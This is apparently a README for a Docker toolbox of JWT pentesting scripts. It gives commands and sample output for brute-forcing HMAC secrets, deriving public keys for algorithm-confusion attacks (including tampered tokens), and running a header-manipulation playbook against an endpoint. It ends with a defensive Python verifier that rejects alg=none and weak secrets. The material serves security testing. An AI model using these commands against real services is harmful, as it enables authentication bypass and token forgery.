The goal of this image is to provide a ready-to-use toolbox of scripts whose objective is to perform different kinds of attacks against JWT tokens.
💡 Indeed, some existing scripts require a specific runtime, packages, etc., so the goal is to have a quick ready-to-use sandbox in which to execute them and obtain a crafted JWT token.
Use the following set of commands to build the Docker image of the toolbox:
git clone https://github.com/righettod/toolbox-jwt.git
cd toolbox-jwt
docker build . -t righettod/toolbox-jwt
💡 The image is built every week and pushed to the GitHub image repository. You can retrieve it with the following command:
docker pull ghcr.io/righettod/toolbox-jwt:main
Use the following command to create a container of the toolbox:
docker run --rm -it ghcr.io/righettod/toolbox-jwt:main /bin/zsh
# From here, use one of the provided script...
To perform an offline brute-force operation against an HMAC secret, use one of these JohnTheRipper packages.
💻 Usage:
john tokens.txt --wordlist=rockyou.txt --rules=best64 --format="HMAC-SHA256"
john tokens.txt --show
Note: Author of the script is the PentesterLab team ❤.
Script to generate derived ECDSA public keys from a JWT ECDSA-signed token. The goal is to test exposure to algorithm confusion attacks on tokens signed with an ECDSA key pair.
💻 Usage:
ruby generate-jwt-ecdsa-derivated-public-keys.rb "JWT_ECDSA_SIGNED_TOKEN"
💻 Example:
# Once in the bash of the toolbox
ruby generate-jwt-ecdsa-derivated-public-keys.rb "eyJ0eXA..."
[+] Key:
-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE6mWiWnAqBhDvAWwyiM7+STTq0Csi
spjd61v7AtpvgKMyOHVMxMQ6yyrjVKp/syHteGSeltXdfEQ0Dlv0tkZQqg==
-----END PUBLIC KEY-----
[+] Key:
-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE7zuf4prcB/qW4AL7d20LSb99Zwwl
hRSCnHTrpnHUnXoqZVAGwCNpYSJf1rpjZQocwwEL016+OuspiQ67N9EDoA==
-----END PUBLIC KEY-----
Note: Author of the tool used by the script is the Silent Signal team ❤.
Script to generate derived RSA public keys from a JWT RSA-signed token. The goal is to test exposure to algorithm confusion attacks on tokens signed with an RSA key pair.
💻 Usage:
bash generate-jwt-rsa-derivated-public-keys.sh "JWT_RSA_SIGNED_TOKEN_1" "JWT_RSA_SIGNED_TOKEN_2"
💻 Example:
# Once in the bash of the toolbox
bash generate-jwt-rsa-derivated-public-keys.sh "eyJ0eXA..." "eyJ0eXA..."
[*] GCD: 0x6b
[*] GCD: 0xd7b8aa3...
[+] Found n with multiplier 1 :
0xd7b8aa...
[+] Written to d7b8aa3fc15ccb45_65537_x509.pem
[+] Tampered JWT: b'eyJ0eXAiOiJ...'
[+] Written to d7b8aa3fc15ccb45_65537_pkcs1.pem
[+] Tampered JWT: b'eyJ0eXAiOiH...'
==============================================================
Here are your JWT's once again for your copypasting pleasure
==============================================================
eyJ0eXAiOiJKV1Qi...
eyJ0eXAiOiJKV1Qj...
Script to test a web service against the TICARPI attack playbook ❤.
💻 Usage:
bash apply-jwt-ticarpi-attack-playbook.sh "ENDPOINT_FULL_URL" "CANARY_WORD" "VALID_JWT_TOKEN"
📍 The canary word is a word that must be present in the HTTP response when the JWT token is accepted (case-sensitive).
💬 The JWT token is added in the header Authorization: Bearer $TOKEN. Edit the script to change its location if needed.
💡 Pipe the command above into | grep --color=always -F "Response Code: 200" to display only requests for which the JWT token was accepted.
💻 Example:
# Once in the bash of the toolbox
bash apply-jwt-ticarpi-attack-playbook.sh "https://righettod.eu/api/profile" "righettod" "eyJ0eXA..."
...
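The three classes of weakness the scripts above probe (a guessable HMAC secret, algorithm confusion, and the header tricks in the TICARPI playbook such as alg=none) share one root cause on the verifying side: the server lets the token's own header drive how it is verified. The following verifier is an added example written for this page, not a script from the toolbox or from the tools it wraps; it uses only the Python standard library and illustrates the defensive counterpart: the algorithm is pinned server-side, the secret is checked against the RFC 7518 minimum of 256 bits for HS256, the signature is compared in constant time, and the expiry claim is enforced. The function and exception names (verify_hs256, sign_hs256, verification_outcome, JwtRejected) are this example's own choices.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

# RFC 7518 section 3.2: keys used with HS256 must be at least 256 bits long.
MIN_HMAC_SECRET_BYTES = 32

# The only algorithm this verifier accepts. Pinned in code, never read from the token.
PINNED_ALG = "HS256"


class JwtRejected(Exception):
    """Raised for any token that must not be accepted; the message says why."""


def b64url_decode(s: str) -> bytes:
    # JWT segments drop base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode("ascii")


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Issue a token the way a legitimate server would (used here to build test input)."""
    if len(secret) < MIN_HMAC_SECRET_BYTES:
        raise ValueError("refusing to sign with a secret shorter than 256 bits")
    header = {"alg": PINNED_ALG, "typ": "JWT"}
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url_encode(sig)}"


def verify_hs256(token: str, secret: bytes, now: Optional[int] = None) -> dict:
    """Return the payload of an acceptable token, or raise JwtRejected."""
    # Defence against offline brute force: a short secret is a configuration error, not a key.
    if len(secret) < MIN_HMAC_SECRET_BYTES:
        raise JwtRejected(f"secret too short (need at least {MIN_HMAC_SECRET_BYTES} bytes)")
    parts = token.split(".")
    if len(parts) != 3:
        raise JwtRejected("malformed token")
    h_b64, p_b64, s_b64 = parts
    try:
        header = json.loads(b64url_decode(h_b64))
        payload = json.loads(b64url_decode(p_b64))
        signature = b64url_decode(s_b64)
    except (ValueError, json.JSONDecodeError):
        raise JwtRejected("malformed token")
    # Defence against alg=none and algorithm confusion: the header may say anything,
    # but only the pinned algorithm with the server's own HMAC secret is ever used.
    alg = header.get("alg")
    if alg != PINNED_ALG:
        raise JwtRejected(f"unexpected alg {alg!r}")
    expected = hmac.new(secret, f"{h_b64}.{p_b64}".encode(), hashlib.sha256).digest()
    # Constant-time comparison; an empty or truncated signature fails here too.
    if not hmac.compare_digest(expected, signature):
        raise JwtRejected("bad signature")
    current = int(time.time()) if now is None else now
    if "exp" in payload and current >= int(payload["exp"]):
        raise JwtRejected("token expired")
    return payload


def verification_outcome(token: str, secret: bytes, now: Optional[int] = None) -> str:
    """Convenience wrapper: 'ok' for an accepted token, otherwise the rejection reason."""
    try:
        verify_hs256(token, secret, now)
        return "ok"
    except JwtRejected as exc:
        return str(exc)


if __name__ == "__main__":
    # Constructed sample secret and token; a real deployment would load the secret from a KMS or vault.
    secret = hashlib.sha256(b"constructed-example-secret").digest()  # 32 bytes
    token = sign_hs256({"sub": "alice", "exp": 2_000_000_000}, secret)
    print("valid token      :", verification_outcome(token, secret, now=1_000))
    # Same payload but header rewritten to alg=none with an empty signature, as a verifier must see it.
    h_none = b64url_encode(b'{"alg":"none","typ":"JWT"}')
    print("alg=none token   :", verification_outcome(f"{h_none}.{token.split('.')[1]}.", secret))
    print("short secret     :", verification_outcome(token, b"secret"))
    print("expired token    :", verification_outcome(token, secret, now=2_000_000_000))
```

Running the script prints "ok" for the genuine token and a distinct reason for each of the other three cases. The same structure applies to RS256/ES256 deployments: the server selects the verification key and algorithm from its own configuration, and a token whose header names a different algorithm is rejected before any cryptography runs, which is what closes the confusion path the ECDSA and RSA scripts above are designed to find.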
- https://blog.pentesterlab.com/exploring-algorithm-confusion-attacks-on-jwt-exploiting-ecdsa-23f7ff83390f
- https://github.com/silentsignal/rsa_sign2n
- https://blog.silentsignal.eu/2021/02/08/abusing-jwt-public-keys-without-the-public-key/
- https://github.com/ticarpi/jwt_tool
- https://github.com/ticarpi/jwt_tool/wiki
- https://github.com/Sjord/jwtcrack
- https://www.openwall.com/john/
- https://github.com/openwall/john
- https://gist.github.com/pich4ya/f76280b7a6af67a9adf740f3ee547689
- https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases
- https://www.javainuse.com/jwtgenerator
- https://jwt.io/
- https://github.com/openwall/john-packages
- https://token.dev/